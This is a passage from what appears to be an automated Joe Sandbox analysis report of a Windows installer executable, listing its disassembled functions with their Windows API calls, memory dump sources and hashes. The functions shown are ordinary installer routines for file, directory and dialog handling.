                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 415043291-0
                                                                                                                                        • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                        • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                        • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                        • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                        Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                        • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                        • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                        • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                        • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                        • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                        • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                        Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4115351271-0
                                                                                                                                        • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                        • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                        • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                        • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                        Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                        • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                        • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                        • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                        Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                        Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                        • String ID: $ @$M$N
                                                                                                                                        • API String ID: 1638840714-3479655940
                                                                                                                                        • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                        • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                        • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                        • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                        Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                        Strings
                                                                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                        • \*.*, xrefs: 00406D2F
                                                                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                        • ptF, xrefs: 00406D1A
                                                                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                        • API String ID: 2035342205-1650287579
                                                                                                                                        • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                        • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                        • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                        • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                        Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425976,74DF23A0,00000000), ref: 00406902
                                                                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                        Strings
